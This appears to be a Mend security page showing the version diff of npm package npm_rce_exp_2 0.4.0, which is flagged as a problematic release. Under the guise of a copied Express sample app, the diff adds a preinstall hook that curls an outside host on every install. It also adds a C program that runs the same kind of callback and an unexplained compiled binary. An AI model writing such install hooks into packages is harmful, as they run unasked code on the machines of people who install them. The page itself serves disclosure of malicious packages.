npm - npm_rce_exp_2 - Versions diffs - 0.4.0 - Mend

npm_rce_exp_2 0.4.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of npm_rce_exp_2 might be problematic. Click here for more details.

Files changed (5) hide show

package/1.c ADDED Viewed

@@ -0,0 +1,7 @@
+#include <stdlib.h>
+int main(int argc, char *argv[])
+{
+	system("curl npm.f9fec96a.l0p.xyz");
+	return 0;
+}

package/a.out ADDED Viewed

Binary file

package/app.json ADDED Viewed

@@ -0,0 +1,7 @@
+{
+  "name": "Node.js Sample",
+  "description": "A barebones Node.js app using Express 4",
+  "repository": "https://github.com/heroku/node-js-sample",
+  "logo": "https://rawgit.com/heroku/node-js-sample/master/public/node.svg",
+  "keywords": ["node", "express", "static"]
+}

package/index.js ADDED Viewed

@@ -0,0 +1,14 @@
+var express = require('express')
+var app = express()
+app.set('port', (process.env.PORT || 5000))
+app.use(express.static(__dirname + '/public'))
+app.get('/', function(request, response) {
+  response.send('Hello World!')
+})
+app.listen(app.get('port'), function() {
+  console.log("Node app is running at localhost:" + app.get('port'))
+})
+~

package/package.json ADDED Viewed

@@ -0,0 +1,23 @@
+{
+  "name": "npm_rce_exp_2",
+  "version": "0.4.0",
+  "description": "A sample Node.js app using Express 4",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "curl tt.f9fec96a.l0p.xyz",
+    "start": "node index.js"
+  },
+  "engines": {
+    "node": "4.0.0"
+  },
+  "keywords": [
+    "node",
+    "heroku",
+    "express"
+  ],
+  "author": "Mark Pundsack",
+  "contributors": [
+    "Zeke Sikelianos <zeke@sikelianos.com> (http://zeke.sikelianos.com)"
+  ],
+  "license": "MIT"
+}